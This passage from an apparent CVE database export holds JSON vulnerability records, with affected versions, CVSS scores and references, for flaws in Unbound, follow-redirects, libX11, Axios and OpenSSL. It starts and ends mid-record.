], "url": "https://access.redhat.com/errata/RHSA-2024:1801" }, { "name": "RHSA-2024:1802", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1802" }, { "name": "RHSA-2024:1804", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1804" }, { "name": "RHSA-2024:2587", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2587" }, { "name": "RHSA-2024:2696", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2696" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2024-1488" }, { "name": "RHBZ#2264183", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2264183" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://src.fedoraproject.org/rpms/unbound/", "defaultStatus": "unaffected", "packageName": "unbound", "versions": [ { "status": "affected", "version": "1.16.2" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.16.2-5.el8_9.6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_aus:8.2::appstream", "cpe:/a:redhat:rhel_tus:8.2::appstream", "cpe:/a:redhat:rhel_e4s:8.2::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.2 Advanced Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.3-12.el8_2.1", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_aus:8.2::appstream", "cpe:/a:redhat:rhel_tus:8.2::appstream", "cpe:/a:redhat:rhel_e4s:8.2::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.3-12.el8_2.1", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_aus:8.2::appstream", "cpe:/a:redhat:rhel_tus:8.2::appstream", "cpe:/a:redhat:rhel_e4s:8.2::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.3-12.el8_2.1", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.4::appstream", "cpe:/a:redhat:rhel_aus:8.4::appstream", "cpe:/a:redhat:rhel_e4s:8.4::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.3-15.el8_4.1", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.4::appstream", "cpe:/a:redhat:rhel_aus:8.4::appstream", "cpe:/a:redhat:rhel_e4s:8.4::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.3-15.el8_4.1", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.4::appstream", "cpe:/a:redhat:rhel_aus:8.4::appstream", "cpe:/a:redhat:rhel_e4s:8.4::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.3-15.el8_4.1", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:8.6::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.3-17.el8_6.4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:8.8::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.16.2-5.el8_8.4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.16.2-3.el9_3.5", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.0::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.13.1-13.el9_0.4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/a:redhat:rhel_eus:9.2::crb" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.16.2-3.el9_2.4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" } ], "datePublic": "2024-02-13T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Important" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-15", "description": "External Control of System or Configuration Setting", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-13T14:45:55.751Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:1750", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1750" }, { "name": "RHSA-2024:1751", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1751" }, { "name": "RHSA-2024:1780", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1780" }, { "name": "RHSA-2024:1801", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1801" }, { "name": "RHSA-2024:1802", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1802" }, { "name": "RHSA-2024:1804", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1804" }, { "name": "RHSA-2024:2587", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2587" }, { "name": "RHSA-2024:2696", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2696" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2024-1488" }, { "name": "RHBZ#2264183", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2264183" } ], "timeline": [ { "lang": "en", "time": "2024-02-14T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2024-02-13T00:00:00+00:00", "value": "Made public." } ], "title": "Unbound: unrestricted reconfiguration enabled to anyone that may lead to local privilege escalation", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-276-\u003eCWE-15: Incorrect Default Permissions leads to External Control of System or Configuration Setting" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2024-1488", "datePublished": "2024-02-15T05:04:13.994Z", "dateReserved": "2024-02-14T12:47:25.283Z", "dateUpdated": "2024-11-13T14:45:55.751Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-28849
Vulnerability from cvelistv5
Published
2024-03-14 17:07
Modified
2024-08-02 19:46
Severity ?
EPSS score ?
Summary
follow-redirects is an open source, drop-in replacement for Node's `http` and `https` modules that automatically follows redirects. In affected versions follow-redirects only clears authorization header during cross-domain redirect, but keep the proxy-authentication header which contains credentials too. This vulnerability may lead to credentials leak, but has been addressed in version 1.15.6. Users are advised to upgrade. There are no known workarounds for this vulnerability.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | follow-redirects | follow-redirects |
Version: < 1.15.6 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T00:56:58.148Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-cxjh-pqwp-8mfp", "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-cxjh-pqwp-8mfp" }, { "name": "https://github.com/psf/requests/issues/1885", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/psf/requests/issues/1885" }, { "name": "https://github.com/follow-redirects/follow-redirects/commit/c4f847f85176991f95ab9c88af63b1294de8649b", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/follow-redirects/follow-redirects/commit/c4f847f85176991f95ab9c88af63b1294de8649b" }, { "name": "https://hackerone.com/reports/2390009", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://hackerone.com/reports/2390009" }, { "name": "https://fetch.spec.whatwg.org/#authentication-entries", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://fetch.spec.whatwg.org/#authentication-entries" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOIF4EPQUCKDBEVTGRQDZ3CGTYQHPO7Z/" } ], "title": "CVE Program Container" }, { "affected": [ { "cpes": [ "cpe:2.3:a:follow-redirects_project:follow-redirects:*:*:*:*:*:node.js:*:*" ], "defaultStatus": "unknown", "product": "follow-redirects", "vendor": "follow-redirects_project", "versions": [ { "lessThan": "1.15.6", "status": "affected", "version": "0", "versionType": "custom" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2024-28849", "options": [ { "Exploitation": "poc" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-08-02T19:45:25.235625Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-02T19:46:22.123Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "follow-redirects", "vendor": "follow-redirects", "versions": [ { "status": "affected", "version": "\u003c 1.15.6" } ] } ], "descriptions": [ { "lang": "en", "value": "follow-redirects is an open source, drop-in replacement for Node\u0027s `http` and `https` modules that automatically follows redirects. In affected versions follow-redirects only clears authorization header during cross-domain redirect, but keep the proxy-authentication header which contains credentials too. This vulnerability may lead to credentials leak, but has been addressed in version 1.15.6. Users are advised to upgrade. There are no known workarounds for this vulnerability." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-200", "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-14T17:07:27.338Z", "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M" }, "references": [ { "name": "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-cxjh-pqwp-8mfp", "tags": [ "x_refsource_CONFIRM" ], "url": "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-cxjh-pqwp-8mfp" }, { "name": "https://github.com/psf/requests/issues/1885", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/psf/requests/issues/1885" }, { "name": "https://github.com/follow-redirects/follow-redirects/commit/c4f847f85176991f95ab9c88af63b1294de8649b", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/follow-redirects/follow-redirects/commit/c4f847f85176991f95ab9c88af63b1294de8649b" }, { "name": "https://hackerone.com/reports/2390009", "tags": [ "x_refsource_MISC" ], "url": "https://hackerone.com/reports/2390009" }, { "name": "https://fetch.spec.whatwg.org/#authentication-entries", "tags": [ "x_refsource_MISC" ], "url": "https://fetch.spec.whatwg.org/#authentication-entries" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOIF4EPQUCKDBEVTGRQDZ3CGTYQHPO7Z/" } ], "source": { "advisory": "GHSA-cxjh-pqwp-8mfp", "discovery": "UNKNOWN" }, "title": "Proxy-Authorization header kept across hosts in follow-redirects" } }, "cveMetadata": { "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "assignerShortName": "GitHub_M", "cveId": "CVE-2024-28849", "datePublished": "2024-03-14T17:07:27.338Z", "dateReserved": "2024-03-11T22:45:07.685Z", "dateUpdated": "2024-08-02T19:46:22.123Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-43787
Vulnerability from cvelistv5
Published
2023-10-10 12:26
Modified
2024-12-03 14:50
Severity ?
EPSS score ?
Summary
A vulnerability was found in libX11 due to an integer overflow within the XCreateImage() function. This flaw allows a local user to trigger an integer overflow and execute arbitrary code with elevated privileges.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2145 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2973 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-43787 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2242254 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ |
Version: 0 ≤ |
||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T19:52:11.097Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/01/24/9" }, { "name": "RHSA-2024:2145", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2145" }, { "name": "RHSA-2024:2973", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2973" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-43787" }, { "name": "RHBZ#2242254", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242254" }, { "tags": [ "x_transferred" ], "url": "https://jfrog.com/blog/xorg-libx11-vulns-cve-2023-43786-cve-2023-43787-part-two/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20231103-0006/" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-43787", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-01-29T18:42:49.281830Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-12-03T14:50:50.506Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "collectionURL": "https://gitlab.freedesktop.org/xorg/lib/libx11", "defaultStatus": "unaffected", "packageName": "libX11", "versions": [ { "lessThan": "1.8.7", "status": "affected", "version": "0", "versionType": "semver" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "libX11", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.6.8-8.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "libX11", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.0-9.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "libX11", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "libX11", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" } ], "datePublic": "2023-10-04T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A vulnerability was found in libX11 due to an integer overflow within the XCreateImage() function. This flaw allows a local user to trigger an integer overflow and execute arbitrary code with elevated privileges." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-122", "description": "Heap-based Buffer Overflow", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-23T02:02:57.256Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2145", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2145" }, { "name": "RHSA-2024:2973", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2973" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-43787" }, { "name": "RHBZ#2242254", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242254" } ], "timeline": [ { "lang": "en", "time": "2023-10-05T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-10-04T00:00:00+00:00", "value": "Made public." } ], "title": "Libx11: integer overflow in xcreateimage() leading to a heap overflow", "x_redhatCweChain": "CWE-122: Heap-based Buffer Overflow" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-43787", "datePublished": "2023-10-10T12:26:08.102Z", "dateReserved": "2023-09-22T09:52:31.108Z", "dateUpdated": "2024-12-03T14:50:50.506Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45857
Vulnerability from cvelistv5
Published
2023-11-08 00:00
Modified
2024-09-04 15:15
Severity ?
EPSS score ?
Summary
An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:29:32.674Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/axios/axios/issues/6006" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-45857", "options": [ { "Exploitation": "poc" }, { "Automatable": "yes" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-09-04T15:13:57.418014Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-09-04T15:15:16.506Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-21T19:06:56.497896", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/axios/axios/issues/6006" }, { "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-45857", "datePublished": "2023-11-08T00:00:00", "dateReserved": "2023-10-14T00:00:00", "dateUpdated": "2024-09-04T15:15:16.506Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-5678
Vulnerability from cvelistv5
Published
2023-11-06 15:47
Modified
2024-10-14 14:55
Severity ?
EPSS score ?
Summary
Issue summary: Generating excessively long X9.42 DH keys or checking
excessively long X9.42 DH keys or parameters may be very slow.
Impact summary: Applications that use the functions DH_generate_key() to
generate an X9.42 DH key may experience long delays. Likewise, applications
that use DH_check_pub_key(), DH_check_pub_key_ex() or EVP_PKEY_public_check()
to check an X9.42 DH key or X9.42 DH parameters may experience long delays.
Where the key or parameters that are being checked have been obtained from
an untrusted source this may lead to a Denial of Service.
While DH_check() performs all the necessary checks (as of CVE-2023-3817),
DH_check_pub_key() doesn't make any of these checks, and is therefore
vulnerable for excessively large P and Q parameters.
Likewise, while DH_generate_key() performs a check for an excessively large
P, it doesn't check for an excessively large Q.
An application that calls DH_generate_key() or DH_check_pub_key() and
supplies a key or parameters obtained from an untrusted source could be
vulnerable to a Denial of Service attack.
DH_generate_key() and DH_check_pub_key() are also called by a number of
other OpenSSL functions. An application calling any of those other
functions may similarly be affected. The other functions affected by this
are DH_check_pub_key_ex(), EVP_PKEY_public_check(), and EVP_PKEY_generate().
Also vulnerable are the OpenSSL pkey command line application when using the
"-pubcheck" option, as well as the OpenSSL genpkey command line application.
The OpenSSL SSL/TLS implementation is not affected by this issue.
The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:07:32.546Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20231106.txt" }, { "name": "1.0.2zj git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=34efaef6c103d636ab507a0cc34dca4d3aecc055" }, { "name": "1.1.1x git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=710fee740904b6290fef0dd5536fbcedbc38ff0c" }, { "name": "3.0.13 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db925ae2e65d0d925adef429afc37f75bd1c2017" }, { "name": "3.1.5 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ddeb4b6c6d527e54ce9a99cba785c0f7776e54b6" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20231130-0010/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/11/1" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "lessThan": "1.0.2zj", "status": "affected", "version": "1.0.2", "versionType": "custom" }, { "lessThan": "1.1.1x", "status": "affected", "version": "1.1.1", "versionType": "custom" }, { "lessThan": "3.0.13", "status": "affected", "version": "3.0.0", "versionType": "semver" }, { "lessThan": "3.1.5", "status": "affected", "version": "3.1.0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "David Benjamin (Google)" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Richard Levitte" } ], "datePublic": "2023-11-06T00:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Issue summary: Generating excessively long X9.42 DH keys or checking\u003cbr\u003eexcessively long X9.42 DH keys or parameters may be very slow.\u003cbr\u003e\u003cbr\u003eImpact summary: Applications that use the functions DH_generate_key() to\u003cbr\u003egenerate an X9.42 DH key may experience long delays. Likewise, applications\u003cbr\u003ethat use DH_check_pub_key(), DH_check_pub_key_ex() or EVP_PKEY_public_check()\u003cbr\u003eto check an X9.42 DH key or X9.42 DH parameters may experience long delays.\u003cbr\u003eWhere the key or parameters that are being checked have been obtained from\u003cbr\u003ean untrusted source this may lead to a Denial of Service.\u003cbr\u003e\u003cbr\u003eWhile DH_check() performs all the necessary checks (as of CVE-2023-3817),\u003cbr\u003eDH_check_pub_key() doesn\u0027t make any of these checks, and is therefore\u003cbr\u003evulnerable for excessively large P and Q parameters.\u003cbr\u003e\u003cbr\u003eLikewise, while DH_generate_key() performs a check for an excessively large\u003cbr\u003eP, it doesn\u0027t check for an excessively large Q.\u003cbr\u003e\u003cbr\u003eAn application that calls DH_generate_key() or DH_check_pub_key() and\u003cbr\u003esupplies a key or parameters obtained from an untrusted source could be\u003cbr\u003evulnerable to a Denial of Service attack.\u003cbr\u003e\u003cbr\u003eDH_generate_key() and 